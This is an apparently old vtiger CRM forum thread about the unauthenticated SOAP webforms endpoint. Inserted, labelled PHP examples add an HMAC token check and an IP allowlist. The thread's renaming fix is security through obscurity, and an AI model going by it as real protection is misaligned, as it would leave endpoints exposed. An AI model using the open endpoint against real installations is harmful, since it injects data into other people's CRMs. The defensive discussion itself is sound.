The webforms work simply enough.
But I am concerned about security.
It seems that a webform set up anywhere, with config.php modified to point to ANY valid vtiger installation, can push data from that form into that vtiger installation. There is no authentication.
Please correct me if I am incorrect, but this IS a HUGE security risk.
What's to stop someone from posting via the webforms to any number of vtiger installations?
What is the solution? I am sure a key or password mechanism would work fine.
Comments
Our webform implementation is very basic right now. We are planning to enhance the feature in the upcoming release.
Regards,
Prasad
vtiger team
Yes, I realize it is very basic.
I have just recently added more fields and a captcha to my forms, but realized the backend doesn't seem to have any security.
I assume you are in agreement with my observations.
I would like to put my own check or password-based auth into the backend so that it is actually secure.
I am a new programmer, and I would appreciate any pointers on which file (probably in the SOAP backend) I would need to add the password check to.
I have already added session-based checking for variable holding, so it should be trivial to pass a token or key.
I just don't know the code well enough to understand where the data gets passed to.
The data gets passed on to vtigercrm/soap/webforms.php, which handles the SOAP requests from the webforms.
Please do keep us updated with your modifications.
Thank you,
Prasad
vtiger team
First I will start with my current modifications.
*** features ***
more entry fields
firstname *required
lastname *required
company *required
email *required
phone
street
city
country
description
reCAPTCHA spam protection
email notification of webform submittal
The email notification code was borrowed from another forum post I found earlier.
My modifications involve these files.
/webforms/lead/index.php
/webforms/lead/send_data.php
(vtigerhostname)/soap/webforms.php
And I added these files.
/webforms/lead/form.css
/webforms/lead/validateform.js (pulled from index.php and modified)
/webforms/lead/recaptchalib.php (received from http://recaptcha.net/whyrecaptcha.html ; please go there to sign up and get a captcha on your form)
/webforms/lead/oops.png
that is that the form data is kept if a user presses the back button between filling out the form and submitting it.
Now my idea for hacking in some form of security.
---
The major problem, as I see it, is that there is no check in webforms.php of where the data being sent to it comes from.
I don't have an elegant solution at the moment. (I am not a terribly good programmer.)
But there is a solution.
The basic idea behind this fix is that in order to exploit the webforms SOAP interface, the exploiter must know how to access the processing form, in this case webforms.php.
This idea is security through obscurity. We rename webforms.php and the name of the SOAP service and change the code in the required files.
For example.
It requires modification of these files.
Change vtigerservice.php
Change this line
to (it should actually be any random string of your choosing)
Change send_data.php
to (match the service name entered in vtigerservice.php)
And finally rename
webforms.php
to
udhy382j.php (match the vtigerservice.php entry as well).
I don't know if any other pages rely on the presence of webforms.php, but for now this should provide a small level of security, through obscurity.
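The key or password mechanism asked for at the top of the thread, and the check that the rename above only approximates, can be done as a shared secret known to the form host and the CRM host: the form signs each submission with an HMAC over the lead fields and a timestamp, and soap/webforms.php refuses anything whose token does not verify. What follows is an added example written for this page, not vtiger code and not the poster's modifications. WEBFORM_SECRET, WEBFORM_MAX_AGE and the `ts`/`token` parameters are assumed names; the hook points are the files named earlier in the thread (send_data.php on the form side, soap/webforms.php on the CRM side, before the lead is created).

```php
<?php
// Added example, not vtiger code: a shared-secret HMAC token that the form host
// attaches to every submission and that soap/webforms.php verifies before it
// creates a lead. Assumed names: WEBFORM_SECRET (a value you would add to the
// config on both hosts), WEBFORM_MAX_AGE, and the 'ts'/'token' call parameters.

define('WEBFORM_SECRET', 'replace-with-a-long-random-string'); // assumed config value
define('WEBFORM_MAX_AGE', 300);                                 // seconds a token stays valid

// Canonical string the token covers: the lead fields in sorted order plus the
// timestamp, so the CRM side can rebuild it whatever order the fields arrive in.
function webform_canonical(array $fields, $ts) {
    ksort($fields);
    $parts = array();
    foreach ($fields as $k => $v) {
        $parts[] = rawurlencode($k) . '=' . rawurlencode((string) $v);
    }
    $parts[] = 'ts=' . (int) $ts;
    return implode('&', $parts);
}

// Form side (send_data.php): compute the token, then pass $fields, $ts and the
// token to the SOAP call alongside the existing parameters.
function webform_sign(array $fields, $ts, $secret) {
    return hash_hmac('sha256', webform_canonical($fields, $ts), $secret);
}

// Constant-time string comparison, so a wrong token cannot be guessed byte by
// byte from response timing. hash_equals() does the same on PHP 5.6 and later.
function webform_equals($a, $b) {
    if (strlen($a) !== strlen($b)) {
        return false;
    }
    $diff = 0;
    for ($i = 0, $n = strlen($a); $i < $n; $i++) {
        $diff |= ord($a[$i]) ^ ord($b[$i]);
    }
    return $diff === 0;
}

// CRM side (soap/webforms.php): run this before touching the database.
// Returns null when the submission is acceptable, otherwise a short reason
// to log before refusing the record.
function verify_webform_token(array $fields, $ts, $token, $secret, $now = null) {
    $now = ($now === null) ? time() : $now;
    if (!preg_match('/^\d{1,10}$/', (string) $ts) || abs($now - (int) $ts) > WEBFORM_MAX_AGE) {
        return 'stale or malformed timestamp';   // stops replay of an old capture
    }
    $expected = webform_sign($fields, $ts, $secret);
    if (!webform_equals($expected, (string) $token)) {
        return 'bad token';                      // wrong secret, or fields altered in transit
    }
    return null;
}

// Constructed sample submission, not real data.
$fields = array(
    'firstname' => 'Ada',
    'lastname'  => 'Lovelace',
    'company'   => 'Analytical Engines',
    'email'     => 'ada@example.com',
);
$ts    = time();
$token = webform_sign($fields, $ts, WEBFORM_SECRET);

var_dump(verify_webform_token($fields, $ts, $token, WEBFORM_SECRET));          // accepted
$tampered = $fields;
$tampered['email'] = 'someone-else@example.net';
var_dump(verify_webform_token($tampered, $ts, $token, WEBFORM_SECRET));        // field changed
var_dump(verify_webform_token($fields, $ts, $token, 'wrong-secret'));          // other installation's secret
$old = $ts - 3600;
var_dump(verify_webform_token($fields, $old, webform_sign($fields, $old, WEBFORM_SECRET), WEBFORM_SECRET)); // expired
```

The token proves that whoever built the request held the secret and that the fields were not changed on the way, which is exactly the trust boundary the thread is asking for: a form host whose config.php points at your CRM but lacks your secret gets "bad token". It does not hide the request itself, so send the SOAP call over HTTPS; a captured request can otherwise be replayed until WEBFORM_MAX_AGE runs out (store seen timestamps or add a nonce if that window matters). Note also that the CAPTCHA is checked on the form host, not in the CRM; the token is what lets the CRM trust that the form host did that check.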
If you are not using the webforms plugin on your site, I would recommend renaming soap/webforms.php to soap/webforms.php.txt.
In 5.1 we are planning to provide better webforms integration using the vtiger CRM webservices.
Regards,
Prasad
vtiger team
I'm currently working on a project that this would help tremendously. Right now I'm using a home-grown multi-threaded web server with its own webservice system, which takes the place of the PHP entirely.
It's very secure: session based, IP address verified on each call, etc. But if the vtiger team has a secure alternative, then that could open more doors for various installations/integrations etc.
The project I'm referring to is a work in progress still, but the webservice stuff is coming along nicely.
The webforms extension being developed uses the webservices API added for vtiger CRM 5.1.0.
Kindly look at the following documentation for more details:
http://www.vtiger.com/archives/validation/5.1/2008.10/vtigercrm_5.1.0_webservices.pdf
Related post:
http://www.vtiger.com/blogs/2008/10/23/vtiger-crm-web-services/
Regards,
Prasad
vtiger team
To secure an installation we have added an IP validation check to webforms.php.
This could be useful for all people who need webforms within 5.0.4.
If someone is interested we can post the code here.
Regards,
Dade
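An IP validation check of the kind this post mentions, as an added example for this page rather than Dade's patch or vtiger code: `$WEBFORM_ALLOWED` is an assumed name for the list of form-host addresses an admin would configure, and the addresses in it are constructed from documentation ranges. It goes beyond single addresses to CIDR ranges and shows the one mistake such a check must avoid, trusting a client-supplied forwarding header.

```php
<?php
// Added example, not Dade's patch or vtiger code: an IP allowlist for the top of
// soap/webforms.php. Assumed name: $WEBFORM_ALLOWED, which an admin would fill
// with the public addresses of the hosts that serve the form.

$WEBFORM_ALLOWED = array(
    '203.0.113.10',      // constructed example host (RFC 5737 documentation range)
    '198.51.100.0/24',   // constructed example network
);

// True when IPv4 address $ip lies inside $cidr, given as "a.b.c.d" or "a.b.c.d/n".
function webform_ip_in_cidr($ip, $cidr) {
    if (strpos($cidr, '/') === false) {
        $cidr .= '/32';
    }
    list($net, $bits) = explode('/', $cidr, 2);
    $ipl  = ip2long($ip);
    $netl = ip2long($net);
    if ($ipl === false || $netl === false || !ctype_digit($bits) || (int) $bits > 32) {
        return false;                      // malformed input is never a match
    }
    $bits = (int) $bits;
    $mask = ($bits === 0) ? 0 : (-1 << (32 - $bits));
    return ($ipl & $mask) === ($netl & $mask);
}

// Decide from the connection's source address only. X-Forwarded-For and similar
// headers are written by whoever connects, so they prove nothing; if the CRM sits
// behind a reverse proxy, REMOTE_ADDR is the proxy and the check belongs on the proxy.
function webform_client_allowed(array $allowed, array $server) {
    $ip = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    foreach ($allowed as $cidr) {
        if (webform_ip_in_cidr($ip, $cidr)) {
            return true;
        }
    }
    return false;
}

// First statement of the SOAP handler, before the SOAP server object is created.
function webform_enforce_ip(array $allowed) {
    if (!webform_client_allowed($allowed, $_SERVER)) {
        header('HTTP/1.0 403 Forbidden');
        exit('webform submission refused');
    }
}

// Constructed requests, not live traffic.
var_dump(webform_client_allowed($WEBFORM_ALLOWED, array('REMOTE_ADDR' => '203.0.113.10')));   // listed host
var_dump(webform_client_allowed($WEBFORM_ALLOWED, array('REMOTE_ADDR' => '198.51.100.77')));  // inside the /24
var_dump(webform_client_allowed($WEBFORM_ALLOWED, array('REMOTE_ADDR' => '192.0.2.5')));      // not listed
var_dump(webform_client_allowed($WEBFORM_ALLOWED, array(                                     // spoofed header, still refused
    'REMOTE_ADDR'          => '192.0.2.5',
    'HTTP_X_FORWARDED_FOR' => '203.0.113.10',
)));
```

An IP check on its own is only as narrow as the hosts behind the listed addresses: on shared hosting every site on the form's server passes it, and when the form lives on the CRM host itself it excludes nothing. It pairs well with a per-submission secret, where the address list says which machines may talk to the endpoint and the token says which of them actually holds your configuration.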
I would certainly encourage you to share the code here.
If possible, please do post it on http://trac.vtiger.com and share the patch.
Regards,
Prasad
vtiger team